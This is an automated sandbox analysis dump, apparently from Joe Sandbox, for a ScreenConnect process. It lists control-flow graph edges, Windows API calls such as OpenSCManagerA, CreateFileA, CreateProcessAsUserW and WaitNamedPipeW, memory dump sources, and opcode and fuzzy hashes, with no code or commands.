                                                                                                                                                  control_flow_graph 147 62213f4-6221459 149 6221492-62214b0 147->149 150 622145b-6221465 147->150 155 62214b2-62214bc 149->155 156 62214e9-6221541 OpenSCManagerA 149->156 150->149 151 6221467-6221469 150->151 153 622146b-6221475 151->153 154 622148c-622148f 151->154 157 6221477 153->157 158 6221479-6221488 153->158 154->149 155->156 159 62214be-62214c0 155->159 166 6221543-6221549 156->166 167 622154a-6221582 156->167 157->158 158->158 160 622148a 158->160 161 62214c2-62214cc 159->161 162 62214e3-62214e6 159->162 160->154 164 62214d0-62214df 161->164 165 62214ce 161->165 162->156 164->164 168 62214e1 164->168 165->164 166->167 172 6221592-6221596 167->172 173 6221584-6221588 167->173 168->162 175 62215a6 172->175 176 6221598-622159c 172->176 173->172 174 622158a 173->174 174->172 178 62215a7 175->178 176->175 177 622159e 176->177 177->175 178->178
                                                                                                                                                  APIs
                                                                                                                                                  • OpenSCManagerA.SECHOST(?,?,?), ref: 0622152B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2448475117.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_6220000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ManagerOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1889721586-0
                                                                                                                                                  • Opcode ID: fec4fce17844dcf3b979bd478d842d2fa95b5b30264c8fcdecd9298ecf9da1a2
                                                                                                                                                  • Instruction ID: f0a787a2a2dc284a3d842800f4a8bdf9efce212ff587a0adf684c8e1e3ea60c7
                                                                                                                                                  • Opcode Fuzzy Hash: fec4fce17844dcf3b979bd478d842d2fa95b5b30264c8fcdecd9298ecf9da1a2
                                                                                                                                                  • Instruction Fuzzy Hash: B5515BB1D2026AAFDF54CFA8C885BAEBBF1FB08314F148529ED15A7284D7749491CB81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 179 6221400-6221459 180 6221492-62214b0 179->180 181 622145b-6221465 179->181 186 62214b2-62214bc 180->186 187 62214e9-6221541 OpenSCManagerA 180->187 181->180 182 6221467-6221469 181->182 184 622146b-6221475 182->184 185 622148c-622148f 182->185 188 6221477 184->188 189 6221479-6221488 184->189 185->180 186->187 190 62214be-62214c0 186->190 197 6221543-6221549 187->197 198 622154a-6221582 187->198 188->189 189->189 191 622148a 189->191 192 62214c2-62214cc 190->192 193 62214e3-62214e6 190->193 191->185 195 62214d0-62214df 192->195 196 62214ce 192->196 193->187 195->195 199 62214e1 195->199 196->195 197->198 203 6221592-6221596 198->203 204 6221584-6221588 198->204 199->193 206 62215a6 203->206 207 6221598-622159c 203->207 204->203 205 622158a 204->205 205->203 209 62215a7 206->209 207->206 208 622159e 207->208 208->206 209->209
                                                                                                                                                  APIs
                                                                                                                                                  • OpenSCManagerA.SECHOST(?,?,?), ref: 0622152B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2448475117.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_6220000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ManagerOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1889721586-0
                                                                                                                                                  • Opcode ID: a73f0eabe1c73fa602d3ae50a39fcb43a1d707ff3741cfc08d0286674cf9c80f
                                                                                                                                                  • Instruction ID: 349f63ddceb81262ef41358da55fd8abb4071c1cc741c82327e193d0d472d3a0
                                                                                                                                                  • Opcode Fuzzy Hash: a73f0eabe1c73fa602d3ae50a39fcb43a1d707ff3741cfc08d0286674cf9c80f
                                                                                                                                                  • Instruction Fuzzy Hash: AF516C70D2026AAFDF54CFA8C885BAEBBF1FF08314F108529ED15A7280D7749491CB81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 210 5c0d730-5c0dc6c 212 5c0dcc0-5c0dd43 CreateFileA 210->212 213 5c0dc6e-5c0dc93 210->213 222 5c0dd45-5c0dd4b 212->222 223 5c0dd4c-5c0dd8a 212->223 213->212 216 5c0dc95-5c0dc97 213->216 217 5c0dc99-5c0dca3 216->217 218 5c0dcba-5c0dcbd 216->218 220 5c0dca5 217->220 221 5c0dca7-5c0dcb6 217->221 218->212 220->221 221->221 224 5c0dcb8 221->224 222->223 228 5c0dd9a 223->228 229 5c0dd8c-5c0dd90 223->229 224->218 231 5c0dd9b 228->231 229->228 230 5c0dd92 229->230 230->228 231->231
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05C0DD2D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 1af534216435c5b494d79f602342f486cab72954288df5285131a639eaf70c7d
                                                                                                                                                  • Instruction ID: e609c4f794ee6cd0a39db342dc9caa13b3feae67cf70058574b4c650f4d22106
                                                                                                                                                  • Opcode Fuzzy Hash: 1af534216435c5b494d79f602342f486cab72954288df5285131a639eaf70c7d
                                                                                                                                                  • Instruction Fuzzy Hash: 585155B1D003499FDB10CFA9C844B9EBBF2FB48314F149569E809AB291D7B99845CB91

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 232 5c0dc04-5c0dc6c 234 5c0dcc0-5c0dd43 CreateFileA 232->234 235 5c0dc6e-5c0dc93 232->235 244 5c0dd45-5c0dd4b 234->244 245 5c0dd4c-5c0dd8a 234->245 235->234 238 5c0dc95-5c0dc97 235->238 239 5c0dc99-5c0dca3 238->239 240 5c0dcba-5c0dcbd 238->240 242 5c0dca5 239->242 243 5c0dca7-5c0dcb6 239->243 240->234 242->243 243->243 246 5c0dcb8 243->246 244->245 250 5c0dd9a 245->250 251 5c0dd8c-5c0dd90 245->251 246->240 253 5c0dd9b 250->253 251->250 252 5c0dd92 251->252 252->250 253->253
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05C0DD2D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: cdcef443749a937c4f0e97d3b27bdc7bafb3ad03cd3376454d3db45cbd17c493
                                                                                                                                                  • Instruction ID: 54fe9b6fb950e1a99bfbdae4b241fffd3b2da2021add39cea3b95b6da9c98308
                                                                                                                                                  • Opcode Fuzzy Hash: cdcef443749a937c4f0e97d3b27bdc7bafb3ad03cd3376454d3db45cbd17c493
                                                                                                                                                  • Instruction Fuzzy Hash: C25156B1D003499FDB10CFA9C844B9EBBF2FB48314F249529E809AB391D7B99845CF91

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 405 5c02178-5c021d1 407 5c021d3-5c021d9 405->407 408 5c021dc-5c021e0 405->408 407->408 409 5c021e2-5c021e5 408->409 410 5c021e8-5c021fd 408->410 409->410 411 5c0220b-5c02262 CreateProcessAsUserW 410->411 412 5c021ff-5c02208 410->412 413 5c02264-5c0226a 411->413 414 5c0226b-5c02293 411->414 412->411 413->414
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05C0224F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcessUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2217836671-0
                                                                                                                                                  • Opcode ID: 01bba9dcd98f217a27918874dca6b8d7a94d936d459c522f1a5aa9c4e605f7b4
                                                                                                                                                  • Instruction ID: 2edfa2fbd34e6e182ac06ee8ccc35fb7d7f9efa6f3ff789a162a3cbb235bab4e
                                                                                                                                                  • Opcode Fuzzy Hash: 01bba9dcd98f217a27918874dca6b8d7a94d936d459c522f1a5aa9c4e605f7b4
                                                                                                                                                  • Instruction Fuzzy Hash: 14411876900209DFCF10CFA9C884ADEBBF5FF48320F15852AE918A7250D775AA55CF90

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 428 1d9fb40-1d9fb87 call 1d97390 * 2 433 1d9fb89-1d9fbb4 428->433 434 1d9fbba-1d9fbbe 428->434 433->434 435 1d9fbf1-1d9fbf5 434->435 436 1d9fbc0-1d9fbeb 434->436 437 1d9fc0b-1d9fc0f 435->437 438 1d9fbf7-1d9fc05 435->438 436->435 440 1d9fc3b-1d9fccd 437->440 441 1d9fc11-1d9fc35 437->441 438->437 447 1d9fccf-1d9fcfc 440->447 448 1d9fd02-1d9fd06 440->448 441->440 447->448 449 1d9fd08-1d9fd1c 448->449 450 1d9fd22-1d9fd26 448->450 449->450 452 1d9fd28-1d9fd3c 450->452 453 1d9fd42-1d9fd46 450->453 452->453 456 1d9fd48-1d9fd5c 453->456 457 1d9fd62-1d9fd66 453->457 456->457 458 1d9fd68-1d9fd76 457->458 459 1d9fd7c-1d9fd80 457->459 458->459 461 1d9fd82-1d9fd90 459->461 462 1d9fd96-1d9fd9a 459->462 461->462 464 1d9fd9c-1d9fdaa 462->464 465 1d9fdb0-1d9fdb4 462->465 464->465 466 1d9fdca-1d9fdce 465->466 467 1d9fdb6-1d9fdc4 465->467 468 1d9fe01-1d9fe05 466->468 469 1d9fdd0-1d9fdfb 466->469 467->466 470 1d9fe51-1d9fe58 468->470 471 1d9fe07-1d9fe15 468->471 469->468 471->470 472 1d9fe17 471->472 474 1d9fe1a-1d9fe1f 472->474 476 1d9fe59-1d9fed9 call 1d974f8 474->476 477 1d9fe21-1d9fe32 474->477 490 1d9fedb-1d9fef1 476->490 491 1d9ff1c-1d9ff1d 476->491 478 1d9fe3d-1d9fe4f 477->478 479 1d9fe34-1d9fe37 477->479 478->470 478->474 479->478 494 1d9fefa-1d9ff1a 490->494 495 1d9fef3 490->495 492 1d9ff28-1d9ff2d 491->492 494->491 495->494
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: d
                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                  • Opcode ID: 370f15e8a2df86eade28859f65fe216b4e3b7da7d03e337aecb1a2ebddb26238
                                                                                                                                                  • Instruction ID: 48159f33edca87f2f27bf62282dd3bff3c5577ce3caa8bcf388f6357ba79785a
                                                                                                                                                  • Opcode Fuzzy Hash: 370f15e8a2df86eade28859f65fe216b4e3b7da7d03e337aecb1a2ebddb26238
                                                                                                                                                  • Instruction Fuzzy Hash: C2D15C74A00719CFDB04DF68D894A99BBB2FF89310B518659E909AB365DB30FC85CF80

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 498 5c04020-5c04022 499 5c04024-5c04027 498->499 500 5c04028-5c04068 498->500 499->500 501 5c04070-5c040a2 WaitNamedPipeW 500->501 502 5c0406a-5c0406d 500->502 503 5c040a4-5c040aa 501->503 504 5c040ab-5c040d3 501->504 502->501 503->504
                                                                                                                                                  APIs
                                                                                                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 05C0408F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NamedPipeWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3146367894-0
                                                                                                                                                  • Opcode ID: b52961be90df24f581072e1c3c5fbb9f281321fca3bb7430958f2fc3e465ab0f
                                                                                                                                                  • Instruction ID: 1e0e51078c4159a370249e1bb993eaa00e2ab322f5070cb0bb9ccc1982fdbeeb
                                                                                                                                                  • Opcode Fuzzy Hash: b52961be90df24f581072e1c3c5fbb9f281321fca3bb7430958f2fc3e465ab0f
                                                                                                                                                  • Instruction Fuzzy Hash: 882134B68002098FDB14CF9AC484BDFBBF4EB48224F10886ED559A7240D779A645CFA1

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 507 5c04028-5c04068 508 5c04070-5c040a2 WaitNamedPipeW 507->508 509 5c0406a-5c0406d 507->509 510 5c040a4-5c040aa 508->510 511 5c040ab-5c040d3 508->511 509->508 510->511
                                                                                                                                                  APIs
                                                                                                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 05C0408F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NamedPipeWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3146367894-0
                                                                                                                                                  • Opcode ID: 16fef8a26284c4a4de85fa039bbb492053f8b67b2f72e06f485b0b273753e924
                                                                                                                                                  • Instruction ID: aaa1c9ae2e627240510d4d94d7437f43292342a92b538b22cc2f9c63f2f1315e
                                                                                                                                                  • Opcode Fuzzy Hash: 16fef8a26284c4a4de85fa039bbb492053f8b67b2f72e06f485b0b273753e924
                                                                                                                                                  • Instruction Fuzzy Hash: 4221F4B68002098FDB14CF9AC484BDEBBF4FB48324F14846ED559A7240C779A545CFA1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (
                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                  • Opcode ID: 04460fccca045fa5944c825145cbae21eb4f6969f1956fc5f274a246cd3202b9
                                                                                                                                                  • Instruction ID: 980d8e9f5766d08ce8482561a27e0263c36893c268cce4f0550fd8ff33b1bf51
                                                                                                                                                  • Opcode Fuzzy Hash: 04460fccca045fa5944c825145cbae21eb4f6969f1956fc5f274a246cd3202b9
                                                                                                                                                  • Instruction Fuzzy Hash: 5C31F231B002569BAF05EB7CA89046E7BE2FFC8250780852DD505EB344EF74ED059BD1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (
                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                  • Opcode ID: 01152d3f1f47cee1917c497ca39733a1d95e7b39d5d6c108724f19409635af04
                                                                                                                                                  • Instruction ID: 3426095b8ed65ef23d10bd0564d9894a4aed67938b573934eeb417af8f1f8e25
                                                                                                                                                  • Opcode Fuzzy Hash: 01152d3f1f47cee1917c497ca39733a1d95e7b39d5d6c108724f19409635af04
                                                                                                                                                  • Instruction Fuzzy Hash: 6D31BE31B002569BAF15EA6DA89046EBAE2FFC8250780852DD909EB344EF74FD059BD1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b8046c2900e0bf3120fbe89c691696962e4785863406831397a2f2fa94bb07c9
                                                                                                                                                  • Instruction ID: ce135ea3bf997e66348dc1baecd2d59d3807ac85a348a1e6d3c3e116f32ca991
                                                                                                                                                  • Opcode Fuzzy Hash: b8046c2900e0bf3120fbe89c691696962e4785863406831397a2f2fa94bb07c9
                                                                                                                                                  • Instruction Fuzzy Hash: 9DB1A030A10359CFDF15DFA8C494AAEBBB1FF85304F10855AD446AB366DB74D986CB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2da1202b6c88eb5e25128048a8fbe47e76b00aab927b57b1ccd0cd5e83fdfb6d
                                                                                                                                                  • Instruction ID: bb5c9ac07d3b47bfba74e67b3fbfd8474f6e83ea075fba484730ac2a342fb09e
                                                                                                                                                  • Opcode Fuzzy Hash: 2da1202b6c88eb5e25128048a8fbe47e76b00aab927b57b1ccd0cd5e83fdfb6d
                                                                                                                                                  • Instruction Fuzzy Hash: ADA1D374A00609CFDB14DBA8C594AADBBF2BF89300F5481A9E906AB364DB71EC01DB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e7c3d1671690bf3c592dd3d4f448d44366f9bf813ff734ff960f081ce0dc2653
                                                                                                                                                  • Instruction ID: 3c9ba9bc2efdbcdef5500e8ab4049c1fb2b51868b8db921ff1d042275bdc1951
                                                                                                                                                  • Opcode Fuzzy Hash: e7c3d1671690bf3c592dd3d4f448d44366f9bf813ff734ff960f081ce0dc2653
                                                                                                                                                  • Instruction Fuzzy Hash: C7A1F574A00609CFDB14DFA8C594AAEBBF2FF89314B5041A9E906AB364DB71EC01DF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b1420a217346f89590639313c10cbf7e1467d48ed7c6720427c9c721b99c20f9
                                                                                                                                                  • Instruction ID: b04d75e99b3d2bea609a3de1ab13912bd12e189088899b77d280f4dab9d06fa3
                                                                                                                                                  • Opcode Fuzzy Hash: b1420a217346f89590639313c10cbf7e1467d48ed7c6720427c9c721b99c20f9
                                                                                                                                                  • Instruction Fuzzy Hash: BD616F31F002199BEB19EBB9C4907AEBAE6AFC8640F144529D406FB384DF34AD45CB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d0c8827ce4ec553dd020b78055e1bc459411af82f9c91b831fa41d0a2eda6402
                                                                                                                                                  • Instruction ID: 22a5a11fd0920111a88669e2727f72e6ce7f51ac525ca5fcfa613835ceb0f326
                                                                                                                                                  • Opcode Fuzzy Hash: d0c8827ce4ec553dd020b78055e1bc459411af82f9c91b831fa41d0a2eda6402
                                                                                                                                                  • Instruction Fuzzy Hash: 2961E534B10609DFDB14DF69D894AAEB7B2FF8E714B108169E606AB365DB30EC05DB40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b93bb09ff5049c932b30c51b747b7b1d3c0d521e0ff9812fa9e692a96d072a29
                                                                                                                                                  • Instruction ID: 1df94abc3849d046c4b09a5cf038cbed82e5fc65a6a2d3c89c1c99c85ecbf8d4
                                                                                                                                                  • Opcode Fuzzy Hash: b93bb09ff5049c932b30c51b747b7b1d3c0d521e0ff9812fa9e692a96d072a29
                                                                                                                                                  • Instruction Fuzzy Hash: E7515A34700205CFDB14DF6CD49496ABBE6FFD8214B148569E64ADB326EB70EC02DB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 694901c8487a0ce5a68de54ed2308a9e3c8862850df9eecf4267bb3964c7137f
                                                                                                                                                  • Instruction ID: 78e84db894715cdb5fc01349a7d560cc482e0c85cb3c8b71b42dc867b2ea4811
                                                                                                                                                  • Opcode Fuzzy Hash: 694901c8487a0ce5a68de54ed2308a9e3c8862850df9eecf4267bb3964c7137f
                                                                                                                                                  • Instruction Fuzzy Hash: 90514734700206CFDB14EFACD49496ABBE6FFD8214B548569E64ADB325EB70EC01DB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 237121add403299f3a32fc9709b28d8fee617c9f0315e0651d216f232a489211
                                                                                                                                                  • Instruction ID: 9bb3bc994803089e4c9e457534b2c1b2139a7c6ad71227b504fd83af36468b55
                                                                                                                                                  • Opcode Fuzzy Hash: 237121add403299f3a32fc9709b28d8fee617c9f0315e0651d216f232a489211
                                                                                                                                                  • Instruction Fuzzy Hash: B6517030A1075ACFDF15DFA8C454AAEBBB2FF84300F118559D416AB365EB74E885CB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3c01fad6f11e2fa3d4ea693d18d95cf5b816b5ad8c2ca588c787657f53153ce6
                                                                                                                                                  • Instruction ID: 8876435deb10e18a4182209e7bc079f37ac9c1570b5ad6cae7b1d66d0cddc937
                                                                                                                                                  • Opcode Fuzzy Hash: 3c01fad6f11e2fa3d4ea693d18d95cf5b816b5ad8c2ca588c787657f53153ce6
                                                                                                                                                  • Instruction Fuzzy Hash: 61517C317002068BDF15EF79E894A6EBBE2EF88250B50847AE506DB355EF75EC018B90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6ecf1c2ef22d0450e1cc79a2b7eac8ddf045eefc9af6de84a14eb6d4b0d6cac1
                                                                                                                                                  • Instruction ID: ed0163729cf144243a7654a908d278c02d34d178858911e4b49bddc25683fcfc
                                                                                                                                                  • Opcode Fuzzy Hash: 6ecf1c2ef22d0450e1cc79a2b7eac8ddf045eefc9af6de84a14eb6d4b0d6cac1
                                                                                                                                                  • Instruction Fuzzy Hash: 45519E317002068BDF15EF78E494A6E7BE2EF88210B50847AD506DB355EF75EC028B90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5464e3a8fe483248fa6033fd8a44144fbbb3ec0660e6e308cafc32926ffc47f1
                                                                                                                                                  • Instruction ID: 0d4eb62eee693c1fe1380f158b1b81224b7e13013c77b41cd1c9ad7157235286
                                                                                                                                                  • Opcode Fuzzy Hash: 5464e3a8fe483248fa6033fd8a44144fbbb3ec0660e6e308cafc32926ffc47f1
                                                                                                                                                  • Instruction Fuzzy Hash: 8F510830600A05CFDB24DF29D484A5ABBF2FF8E724B244A5DD5969B7A4DB31F805DB40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6a583f2fd8a3d2b248b854cc625fc0d53b12ac66f02833af77a0db6bf19b7070
                                                                                                                                                  • Instruction ID: 48191d6b70d774d8d9a35b1d94f47e2852c964392e5e22ccc01ec31499d07920
                                                                                                                                                  • Opcode Fuzzy Hash: 6a583f2fd8a3d2b248b854cc625fc0d53b12ac66f02833af77a0db6bf19b7070
                                                                                                                                                  • Instruction Fuzzy Hash: 34516530E00349DFDB01DFA8E854B9DBBB2FF89300F519659E505AB291EB74A895CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
